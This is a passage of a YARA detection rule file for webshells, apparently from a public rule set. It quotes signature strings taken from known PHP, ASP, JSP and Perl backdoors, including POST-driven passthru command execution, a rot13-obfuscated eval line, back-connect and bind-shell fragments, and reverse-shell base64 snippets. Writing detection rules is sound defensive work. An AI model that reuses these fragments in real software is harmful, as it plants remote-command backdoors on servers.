        score = 70
        super_rule = 1
        hash0 = "7066f4469c3ec20f4890535b5f299122"
        hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
        hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
        hash3 = "8979594423b68489024447474d113894"
        hash4 = "ec482fc969d182e5440521c913bab9bd"
        hash5 = "f98d2b33cd777e160d1489afed96de39"
        hash6 = "4b4c12b3002fad88ca6346a873855209"
        hash7 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
        hash8 = "e9a5280f77537e23da2545306f6a19ad"
    strings:
        $textarea = "&nbsp;<TEXTAREA NAME=\"cqq\" ROWS=\"20\" COLS=\"100%\"><%=sbCmd.toString()%></TE"
    condition:
        $textarea
}
rule webshell_c99_locus7s_c99_w4cking_xxx {
    // c99 / r57 lineage super-rule keyed on the $cfe command-execution helper. Two of three
    // required; note $obget alone is ordinary PHP, it only counts in combination.
    meta:
        description = "Web Shell - from files c99_locus7s.php, c99_w4cking.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, acid.php, newsh.php, r57.php, Backdoor.PHP.Agent.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "38fd7e45f9c11a37463c3ded1c76af4c"
        hash1 = "9c34adbc8fd8d908cbb341734830f971"
        hash2 = "ef43fef943e9df90ddb6257950b3538f"
        hash3 = "ae025c886fbe7f9ed159f49593674832"
        hash4 = "911195a9b7c010f61b66439d9048f400"
        hash5 = "697dae78c040150daff7db751fc0c03c"
        hash6 = "513b7be8bd0595c377283a7c87b44b2e"
        hash7 = "1d912c55b96e2efe8ca873d6040e3b30"
        hash8 = "e5b2131dd1db0dbdb43b53c5ce99016a"
        hash9 = "4108f28a9792b50d95f95b9e5314fa1e"
        hash10 = "b8f261a3cdf23398d573aaf55eaf63b5"
        hash11 = "0d2c2c151ed839e6bafc7aa9c69be715"
        hash12 = "41af6fd253648885c7ad2ed524e0692d"
        hash13 = "6fcc283470465eed4870bcc3e2d7f14d"
    strings:
        $shellexec = "$res = @shell_exec($cfe);" fullword
        $obget     = "$res = @ob_get_contents();" fullword
        $exec      = "@exec($cfe,$res);" fullword
    condition:
        2 of ($shellexec, $obget, $exec)
}
rule FSO_s_zehir4_2 {
    // zehir4.asp: Serv-U path fragment used by its FTP-server module.
    meta:
        description = "Webshells Auto-generated - file zehir4.asp"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "5b496a61363d304532bcf52ee21f5d55"
    strings:
        $servu = "\"Program Files\\Serv-u\\Serv"
    condition:
        $servu
}
rule FSO_s_RemExp_2 {
    // RemExp.asp: a generic "Then Response.Write" fragment paired with the self-referencing
    // script_name link; the first alone is common ASP, so both are required.
    meta:
        description = "Webshells Auto-generated - file RemExp.asp"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "b69670ecdbb40012c73686cd22696eeb"
    strings:
        $write = " Then Response.Write \""
        $self  = "<a href= \"<%=Request.ServerVariables(\"script_name\")%>"
    condition:
        $write and $self
}
rule WebShell_php_webshells_cw {
    // cw.php (Cyber-Warrior): DB dump header lines, Perl back-connect via passthru(),
    // the IP banner, and the edit-file guard. Three of six required.
    meta:
        description = "PHP Webshells Github Archive - file cw.php"
        author = "Florian Roth"
        hash = "e65e0670ef6edf0a3581be6fe5ddeeffd22014bf"
    strings:
        $dump_hdr  = "// Dump Database [pacucci.com]" fullword
        $dump_db   = "$dump = \"-- Database: \".$_POST['db'] .\" \\n\";" fullword
        $backconn  = "$aids = passthru(\"perl cbs.pl \".$_POST['connhost'].\" \".$_POST['connport']);" fullword
        $ipbanner  = "<b>IP:</b> <u>\" . $_SERVER['REMOTE_ADDR'] .\"</u> - Server IP:</b> <a href='htt"
        $dump_tag  = "$dump .= \"-- Cyber-Warrior.Org\\n\";" fullword
        $editguard = "if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)" fullword
    condition:
        3 of ($dump_*, $backconn, $ipbanner, $editguard)
}
rule uploader_php_php {
    // uploader.php: drops the upload as "entrika.php" (same marker as WebShell_Uploader),
    // plus its file input and MAX_FILE_SIZE field. Two of three required.
    meta:
        description = "Semi-Auto-generated  - file uploader.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "0b53b67bb3b004a8681e1458dd1895d0"
    strings:
        $drop  = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
        $input = "Send this file: <INPUT NAME=\"userfile\" TYPE=\"file\">" fullword
        $limit = "<INPUT TYPE=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">" fullword
    condition:
        2 of ($drop, $input, $limit)
}
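rule WebShell_Generic_PHP_9 {
	// Super-rule over three KAdot/KA_uShell 0.1.6 variants (one hash per file).
	// Strings are PHP fragments: POST-driven passthru(), a base64_decode of a
	// POST field, and the radio buttons of the shell's "tac" tool selector.
	// Three of six required.
	meta:
		description = "PHP Webshells Github Archive - from files KAdot Universal Shell v0.1.6.php, KAdot_Universal_Shell_v0.1.6.php, KA_uShell 0.1.6.php"
		author = "Florian Roth"
		super_rule = 1
		hash0 = "89f2a7007a2cd411e0a7abd2ff5218d212b84d18"
		hash1 = "2266178ad4eb72c2386c0a4d536e5d82bb7ed6a2"
		hash2 = "0daed818cac548324ad0c5905476deef9523ad73"
	strings:
		$s2 = ":<b>\" .base64_decode($_POST['tot']). \"</b>\";" fullword
		$s6 = "if (isset($_POST['wq']) && $_POST['wq']<>\"\") {" fullword
		$s12 = "if (!empty($_POST['c'])){" fullword
		$s13 = "passthru($_POST['c']);" fullword
		$s16 = "<input type=\"radio\" name=\"tac\" value=\"1\">B64 Decode<br>" fullword
		$s20 = "<input type=\"radio\" name=\"tac\" value=\"3\">md5 Hash" fullword
	condition:
		3 of them
}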
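rule Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php {
	// "Safe0ver" safe_mode bypass shell. $s2 is a percent-encoded document.write
	// payload whose prefix decodes to "<html><body><SCRIP". Any single string
	// fires; note that $s0 is a short brand token, so "1 of them" trades
	// precision for recall.
	meta:
		description = "Semi-Auto-generated  - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "6163b30600f1e80d2bb5afaa753490b6"
	strings:
		$s0 = "Safe0ver" fullword
		$s1 = "Script Gecisi Tamamlayamadi!"
		$s2 = "document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%"
	condition:
		1 of them
}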
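rule Release_dllTest {
	// Auto-generated signature for dllTest.dll. The strings are not readable
	// text but short byte runs that look like table/offset data pulled from the
	// binary; all ten must match, which keeps the rule specific but also makes
	// it brittle against any rebuild or repack of the DLL.
	meta:
		description = "Webshells Auto-generated - file dllTest.dll"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "76a59fc3242a2819307bb9d593bef2e0"
	strings:
		$s0 = ";;;Y;`;d;h;l;p;t;x;|;"
		$s1 = "0 0&00060K0R0X0f0l0q0w0"
		$s2 = ": :$:(:,:0:4:8:D:`=d="
		$s3 = "4@5P5T5\\5T7\\7d7l7t7|7"
		$s4 = "1,121>1C1K1Q1X1^1e1k1s1y1"
		$s5 = "9 9$9(9,9P9X9\\9`9d9h9l9p9t9x9|9"
		$s6 = "0)0O0\\0a0o0\"1E1P1q1"
		$s7 = "<.<I<d<h<l<p<t<x<|<"
		$s8 = "3&31383>3F3Q3X3`3f3w3|3"
		$s9 = "8@;D;H;L;P;T;X;\\;a;9=W=z="
	condition:
		all of them
}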
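rule webshell_000_403_c5_queryDong_spyjsp2010_t00ls {
	// Super-rule over six JSP shells sharing the same database-browser code.
	// Both strings are Java string-concatenation fragments that emit the HTML
	// table/form (tbName, selectDb); both are required.
	meta:
		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp, t00ls.jsp"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		super_rule = 1
		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
		hash2 = "8b457934da3821ba58b06a113e0d53d9"
		hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
		hash4 = "655722eaa6c646437c8ae93daac46ae0"
		hash5 = "9c94637f76e68487fa33f7b0030dd932"
	strings:
		$s8 = "table.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbName+\"')"
		$s9 = "\"<p><input type=\\\"hidden\\\" name=\\\"selectDb\\\" value=\\\"\"+selectDb+\""
	condition:
		all of them
}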
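rule WebShell_php_webshells_cpanel {
	// cpanel.php - self-described ftp/cPanel brute forcer. $s0, $s3, $s4 and
	// $s13 are specific to the sample; $s12 (a plain curl option) and $s20 (a
	// login prompt) are generic, and "2 of them" would be satisfied by that
	// generic pair alone - worth keeping in mind when triaging hits.
	meta:
		description = "PHP Webshells Github Archive - file cpanel.php"
		author = "Florian Roth"
		hash = "433dab17106b175c7cf73f4f094e835d453c0874"
	strings:
		$s0 = "function ftp_check($host,$user,$pass,$timeout){" fullword
		$s3 = "curl_setopt($ch, CURLOPT_URL, \"http://$host:2082\");" fullword
		$s4 = "[ user@alturks.com ]# info<b><br><font face=tahoma><br>" fullword
		$s12 = "curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);" fullword
		$s13 = "Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir"
		$s20 = "<br><b>Please enter your USERNAME and PASSWORD to logon<br>" fullword
	condition:
		2 of them
}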
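rule WebShell_Generic_PHP_4 {
	// Super-rule over five PHP shells that share the same permission-rendering
	// code (mode bits -> rwx characters, type from 0x6000 etc.). This snippet is
	// the kind found in ordinary PHP file managers too; requiring all seven
	// strings, including the exact loop/if wording, is what keeps it narrow.
	meta:
		description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, nshell.php, Loaderz WEB Shell.php, stres.php"
		author = "Florian Roth"
		super_rule = 1
		hash0 = "335a0851304acedc3f117782b61479bbc0fd655a"
		hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241"
		hash2 = "86bc40772de71b1e7234d23cab355e1ff80c474d"
		hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791"
		hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de"
	strings:
		$s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword
		$s2 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';" fullword
		$s5 = "$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';" fullword
		$s6 = "$world[\"write\"] = ($mode & 00002) ? 'w' : '-';" fullword
		$s7 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';" fullword
		$s10 = "foreach ($arr as $filename) {" fullword
		$s19 = "else if( $mode & 0x6000 ) { $type='b'; }" fullword
	condition:
		all of them
}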
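rule webshell_PHP_r57142 {
	// r57142.php (r57 family). Single-string rule: the shell's list of remote
	// fetch utilities it tries, kept as an exact PHP array literal.
	meta:
		description = "Web Shell - file r57142.php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "0911b6e6b8f4bcb05599b2885a7fe8a8"
	strings:
		$s0 = "$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');" fullword
	condition:
		all of them
}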
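rule php_backdoor_php {
	// php-backdoor.php: attribution strings (author URL/year, "coded by z0mbie")
	// and a usage hint echoing $SERVER_NAME/$REQUEST_URI. Any one string fires.
	meta:
		description = "Semi-Auto-generated  - file php-backdoor.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
	strings:
		$s0 = "http://michaeldaw.org   2006"
		$s1 = "or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win"
		$s3 = "coded by z0mbie"
	condition:
		1 of them
}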
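rule webshell_metaslsoft {
	// metaslsoft.php. Single string: the directory-listing row builder that
	// links each folder via a "?d=" query parameter.
	meta:
		description = "Web Shell - file metaslsoft.php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "aa328ed1476f4a10c0bcc2dde4461789"
	strings:
		$s7 = "$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>LINK</t"
	condition:
		all of them
}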
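rule PHANTASMA_php {
	// PHANTASMA.php. Two of four: status banners ("[*] Safemode Mode Run",
	// "[*] Spawning Shell"), a file-view link using $SCRIPT_NAME/$QUERY_STRING,
	// and the short handle "Cha0s" (the weakest of the set on its own).
	meta:
		description = "Semi-Auto-generated  - file PHANTASMA.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "52779a27fa377ae404761a7ce76a5da7"
	strings:
		$s0 = ">[*] Safemode Mode Run</DIV>"
		$s1 = "$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>"
		$s2 = "[*] Spawning Shell"
		$s3 = "Cha0s"
	condition:
		2 of them
}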
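rule webshell_Macker_s_Private_PHPShell {
	// "Macker's Private PHPShell". All three HTML-emitting PHP fragments are
	// required: the server-info row, a buildUrl() call, and the POST form whose
	// action is built from $SFileName/$urlAdd.
	meta:
		description = "Web Shell - file Macker's Private PHPShell.php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "e24cbf0e294da9ac2117dc660d890bb9"
	strings:
		$s3 = "echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>Server's PHP Version:&n"
		$s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">["
		$s7 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
	condition:
		all of them
}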
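rule multiple_webshells_0009 {
	// Super-rule over the c99/c99mad/wacking/SpecialShell family (six hashes;
	// the "was" field keeps the generator's original combined rule name).
	// Either the c99 session-state fragment or the eregi() upload-URL check is
	// enough. hash2 and hash5 also appear in multiple_webshells_0015 below.
	meta:
		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		super_rule = 1
		was = "_w_php_php_c99madshell_v2_1_php_php_wacking_php_php_c99shell_v1_0_php_php_c99php_SpecialShell_99_php_php"
		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
		hash1 = "3ca5886cd54d495dc95793579611f59a"
		hash2 = "9c5bb5e3a46ec28039e8986324e42792"
		hash3 = "d8ae5819a0a2349ec552cbcf3a62c975"
		hash4 = "9e9ae0332ada9c3797d6cee92c2ede62"
		hash5 = "09609851caa129e40b0d56e90dfc476c"
	strings:
		$s0 = "$sess_data[\"cut\"] = array(); c99_s"
		$s3 = "if ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))"
	condition:
		1 of them
}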
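rule webshell_GetPostpHp {
	// GetPostpHp.php - a one-line eval shell. The rot13 literal inside decodes
	// to eval($_POST[page]); the rule matches the full obfuscated line exactly,
	// so any re-spelling (spacing, different rot13 payload) evades it.
	meta:
		description = "Web shells - generated from file GetPostpHp.php"
		author = "Florian Roth"
		date = "2014/03/28"
		score = 70
		hash = "20ede5b8182d952728d594e6f2bb5c76"
	strings:
		$s0 = "<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>" fullword
	condition:
		all of them
}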
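rule webshell_gfs_sh_r57shell_r57shell127_SnIpEr_SA_xxx {
	// Super-rule over eleven r57-derived shells. Both strings appear to be
	// slices of a base64-encoded blob embedded in the shells rather than
	// plaintext PHP, so the match depends on the blob's exact alignment; a
	// re-encoded or re-wrapped copy would not hit. Both are required.
	meta:
		description = "Web Shell - from files gfs_sh.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		super_rule = 1
		hash0 = "a2516ac6ee41a7cf931cbaef1134a9e4"
		hash1 = "ef43fef943e9df90ddb6257950b3538f"
		hash2 = "ae025c886fbe7f9ed159f49593674832"
		hash3 = "911195a9b7c010f61b66439d9048f400"
		hash4 = "697dae78c040150daff7db751fc0c03c"
		hash5 = "513b7be8bd0595c377283a7c87b44b2e"
		hash6 = "1d912c55b96e2efe8ca873d6040e3b30"
		hash7 = "e5b2131dd1db0dbdb43b53c5ce99016a"
		hash8 = "4108f28a9792b50d95f95b9e5314fa1e"
		hash9 = "41af6fd253648885c7ad2ed524e0692d"
		hash10 = "6fcc283470465eed4870bcc3e2d7f14d"
	strings:
		$s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"
		$s11 = "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC"
	condition:
		all of them
}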
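rule webshell_asp_shell : webshell {
	// shell.asp. Two HTML form fragments (a "GO!" submit button and a TEXTAREA
	// named "1988"); both must be present. Tagged "webshell" for grouping.
	meta:
		description = "Web Shell - file shell.asp"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "e63f5a96570e1faf4c7b8ca6df750237"
	strings:
		$s7 = "<input type=\"submit\" name=\"Send\" value=\"GO!\">" fullword
		$s8 = "<TEXTAREA NAME=\"1988\" ROWS=\"18\" COLS=\"78\"></TEXTAREA>" fullword
	condition:
		all of them
}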
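rule multiple_webshells_0018 {
	// Super-rule over webadmin/iMHaPFtp/Private-i3lue. Both strings are
	// permission-string code (mode 00400 -> 'r', concatenated type/owner/
	// group/other). Such code also occurs in legitimate PHP file managers, so
	// hits deserve a look at the rest of the file before acting.
	meta:
		description = "Semi-Auto-generated  - from files webadmin.php.php.txt, iMHaPFtp.php.php.txt, Private-i3lue.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		super_rule = 1
		was = "_webadmin_php_php_iMHaPFtp_php_php_Private_i3lue_php"
		hash0 = "b268e6fa3bf3fe496cffb4ea574ec4c7"
		hash1 = "12911b73bc6a5d313b494102abcf5c57"
		hash2 = "13f5c7a035ecce5f9f380967cf9d4e92"
	strings:
		$s0 = "return $type . $owner . $group . $other;" fullword
		$s1 = "$owner  = ($mode & 00400) ? 'r' : '-';" fullword
	condition:
		all of them
}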
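rule shells_PHP_wso {
	// WSO shell. $s0 is the start of the base64 blob assigned to
	// $back_connect_p; $s3 is the "Execution PHP-code" panel header. Either
	// alone fires.
	meta:
		description = "Semi-Auto-generated  - file wso.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "33e2891c13b78328da9062fbfcf898b6"
	strings:
		$s0 = "$back_connect_p=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbi"
		$s3 = "echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=pos"
	condition:
		1 of them
}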
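rule multiple_webshells_0015 {
	// Super-rule over wacking/1.txt/SpecialShell_99/c100 (c99 lineage; hash0
	// and hash2 also appear in multiple_webshells_0009). Strings are the
	// back-connect POST parameter names and an eregi() check on a process
	// scan; any one fires.
	meta:
		description = "Semi-Auto-generated  - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		super_rule = 1
		was = "_wacking_php_php_1_SpecialShell_99_php_php_c100_php"
		hash0 = "9c5bb5e3a46ec28039e8986324e42792"
		hash1 = "44542e5c3e9790815c49d5f9beffbbf2"
		hash2 = "09609851caa129e40b0d56e90dfc476c"
		hash3 = "38fd7e45f9c11a37463c3ded1c76af4c"
	strings:
		$s0 = "if(eregi(\"./shbd $por\",$scan))"
		$s1 = "$_POST['backconnectip']"
		$s2 = "$_POST['backcconnmsg']"
	condition:
		1 of them
}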
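rule webshell_jsp_list1 {
	// list1.jsp. Two Java fragments - a switch case calling ConnectionDBM with a
	// request parameter, and the delFile() javascript link builder; both
	// required.
	meta:
		description = "Web Shell - file list1.jsp"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "8d9e5afa77303c9c01ff34ea4e7f6ca6"
	strings:
		$s1 = "case 's':ConnectionDBM(out,encodeChange(request.getParameter(\"drive"
		$s9 = "return \"<a href=\\\"javascript:delFile('\"+folderReplace(file)+\"')\\\""
	condition:
		all of them
}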
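rule byshell063_ntboot_2 {
	// ntboot.dll (byshell 0.63). Single-string rule on a status message that
	// mentions LocalSystem and SE_DEBUG_NAME.
	meta:
		description = "Webshells Auto-generated - file ntboot.dll"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "cb9eb5a6ff327f4d6c46aacbbe9dda9d"
	strings:
		$s6 = "OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)"
	condition:
		all of them
}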
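rule phpshell_3 {
	// phpshell.php. The "Execute Command" submit button plus the current-
	// directory <option> echo (note $s5 keeps its six leading spaces); both
	// required. webshell_PHP_a later in this file uses near-identical strings
	// for a.php, so the two rules will often fire together.
	meta:
		description = "Webshells Auto-generated - file phpshell.php"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "e8693a2d4a2ffea4df03bb678df3dc6d"
	strings:
		$s3 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>"
		$s5 = "      echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";"
	condition:
		all of them
}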
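rule php_in_image
{
    // Flags GIF/JFIF/PNG files that also contain a PHP open tag anywhere in
    // the body - the usual shape of a webshell smuggled past an image-upload
    // check. The magic bytes are pinned to offset 0 so a "GIF89a" appearing
    // later in a file is not enough. The tag is matched nocase because PHP
    // accepts "<?PHP" as well as "<?php"; short tags ("<?", "<?=") are not
    // covered, only the full tag.
    meta:
        author      = "Vlad https://github.com/vlad-s"
        date        = "2016/07/18"
        description = "Finds image files w/ PHP code in images"
    strings:
        $gif = /^GIF8[79]a/
        $jfif = { ff d8 ff e? 00 10 4a 46 49 46 }
        $png = { 89 50 4e 47 0d 0a 1a 0a }

        $php_tag = "<?php" nocase
    condition:
        (($gif at 0) or
        ($jfif at 0) or
        ($png at 0)) and

        $php_tag
}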
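rule webshell_itsec_itsecteam_shell_jHn {
	// Super-rule over itsec/itsecteam_shell/jHn. Both PHP echo fragments are
	// required: the php_uname() system banner and the DB client form posting to
	// $_SERVER[PHP_SELF]?do=db.
	meta:
		description = "Web Shell - from files itsec.php, itsecteam_shell.php, jHn.php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		super_rule = 1
		hash0 = "8ae9d2b50dc382f0571cd7492f079836"
		hash1 = "bd6d3b2763c705a01cc2b3f105a25fa4"
		hash2 = "40c6ecf77253e805ace85f119fe1cebb"
	strings:
		$s4 = "echo $head.\"<font face='Tahoma' size='2'>Operating System : \".php_uname().\"<b"
		$s5 = "echo \"<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'"
	condition:
		all of them
}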
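rule Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php {
	// Liz0ziM safe_mode bypass shell. Any one of: a preset <option> reading the
	// cPanel accounting log, the tool's title banner, or the "Kimim Ben" uid
	// echo.
	meta:
		description = "Semi-Auto-generated  - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
	strings:
		$s0 = "<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</opt"
		$s1 = "Liz0ziM Private Safe Mode Command Execuriton Bypass"
		$s2 = "echo \"<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>\";" fullword
	condition:
		1 of them
}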
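rule WebShell_php_webshells_NGH {
	// NGH.php ("Webcommander" NGH edition). Strings are the page title, the
	// author comment, the act=bindshell/backconnect/mkdir forms, the login
	// error and the bind-port prompt. Two of seven required.
	meta:
		description = "PHP Webshells Github Archive - file NGH.php"
		author = "Florian Roth"
		hash = "c05b5deecfc6de972aa4652cb66da89cfb3e1645"
	strings:
		$s0 = "<title>Webcommander at <?=$_SERVER[\"HTTP_HOST\"]?></title>" fullword
		$s2 = "/* Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition :p */" fullword
		$s5 = "<form action=<?=$script?>?act=bindshell method=POST>" fullword
		$s9 = "<form action=<?=$script?>?act=backconnect method=POST>" fullword
		$s11 = "<form action=<?=$script?>?act=mkdir method=POST>" fullword
		$s16 = "die(\"<font color=#DF0000>Login error</font>\");" fullword
		$s20 = "<b>Bind /bin/bash at port: </b><input type=text name=port size=8>" fullword
	condition:
		2 of them
}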
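rule Asmodeus_v0_1_pl {
	// Asmodeus v0.1 - a Perl remote shell, not PHP. Strings: a forum URL tag,
	// the example client invocation, the banner print, and the inet_aton()
	// line with its "ALOA:" die message. Two of four required.
	meta:
		description = "Semi-Auto-generated  - file Asmodeus v0.1.pl.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "0978b672db0657103c79505df69cb4bb"
	strings:
		$s0 = "[url=http://www.governmentsecurity.org"
		$s1 = "perl asmodeus.pl client 6666 127.0.0.1"
		$s2 = "print \"Asmodeus Perl Remote Shell"
		$s4 = "$internet_addr = inet_aton(\"$host\") or die \"ALOA:$!\\n\";" fullword
	condition:
		2 of them
}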
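rule WebShell_Generic_PHP_5 {
	// Super-rule over ex0shell/megabor/GRP WebShell. All six strings are from a
	// fileperms()-to-string routine ($perms masks, "// Block special",
	// "$info = 's';") that closely resembles the widely copied PHP manual
	// example, so legitimate code can contain every one of them; treat hits as
	// a prompt to inspect, not as confirmation.
	meta:
		description = "PHP Webshells Github Archive - from files ex0shell.php, megabor.php, GRP WebShell 2.0 release build 2018 (C)2006,Great.php"
		author = "Florian Roth"
		super_rule = 1
		hash0 = "64461ad8d8f23ea078201a31d747157f701a4e00"
		hash1 = "3df1afbcfa718da6fc8af27554834ff6d1a86562"
		hash2 = "ad86ef7f24f75081318146edc788e5466722a629"
	strings:
		$s0 = "(($perms & 0x0400) ? 'S' : '-'));" fullword
		$s10 = "} elseif (($perms & 0x8000) == 0x8000) {" fullword
		$s11 = "if (($perms & 0xC000) == 0xC000) {" fullword
		$s12 = "$info .= (($perms & 0x0008) ?" fullword
		$s16 = "// Block special" fullword
		$s18 = "$info = 's';" fullword
	condition:
		all of them
}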
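rule Pack_InjectT {
	// InjectT.exe (packed build). The strings look like truncated pieces of
	// longer messages ("ail To Open Registry", "vide Internet S", "d]Software\M")
	// as they survive in the packed image, plus the "TInject.Dll" name; all
	// five required. Expect it not to match an unpacked copy.
	meta:
		description = "Webshells Auto-generated - file InjectT.exe"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "983b74ccd57f6195a0584cdfb27d55e8"
	strings:
		$s3 = "ail To Open Registry"
		$s4 = "32fDssignim"
		$s5 = "vide Internet S"
		$s6 = "d]Software\\M"
		$s7 = "TInject.Dll"
	condition:
		all of them
}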
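rule webshell_PHP_a : webshell {
	// a.php. Two of three: the reversed-path <option> builder, the current-
	// directory <option>, and the "Execute Command" button ($s4 ends with a
	// space and is fullword). Overlaps with phpshell_3 earlier in this file,
	// which targets the same strings in phpshell.php.
	meta:
		description = "Web Shell - file a.php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "e3b461f7464d81f5022419d87315a90d"
	strings:
		$s1 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\""
		$s2 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>"
		$s4 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p> " fullword
	condition:
		2 of them
}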
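rule HYTop_DevPack_config {
	// HYTop DevPack config.asp: the three constant declarations
	// (adminPassword, userPassword, mVersion) must all be present. Matches the
	// shell's configuration file rather than its main page.
	meta:
		description = "Webshells Auto-generated - file config.asp"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "b41d0e64e64a685178a3155195921d61"
	strings:
		$s0 = "const adminPassword=\""
		$s2 = "const userPassword=\""
		$s3 = "const mVersion="
	condition:
		all of them
}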
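rule Rem_View_php_php {
	// phpRemoteView (RemView). Any one of: the sample PHP snippet with mm()
	// localisation calls, the "rm -fr" delete button, or the welcome banner.
	meta:
		description = "Semi-Auto-generated  - file Rem View.php.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "29420106d9a81553ef0d1ca72b9934d9"
	strings:
		$s0 = "$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\""
		$s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'"
		$s4 = "Welcome to phpRemoteView (RemView)"
	condition:
		1 of them
}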
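rule webshell_shell_phpspy_2006_arabicspy_hkrkoz {
	// Super-rule over shell/phpspy_2006/arabicspy/hkrkoz. Single string: the
	// $prog assignment that defaults to a "/c net start > " command when no
	// POST value is given. hash1 is also listed in the phpspy_2005/2006 rule
	// further down.
	meta:
		description = "Web Shell - from files shell.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		super_rule = 1
		hash0 = "791708057d8b429d91357d38edf43cc0"
		hash1 = "40a1f840111996ff7200d18968e42cfe"
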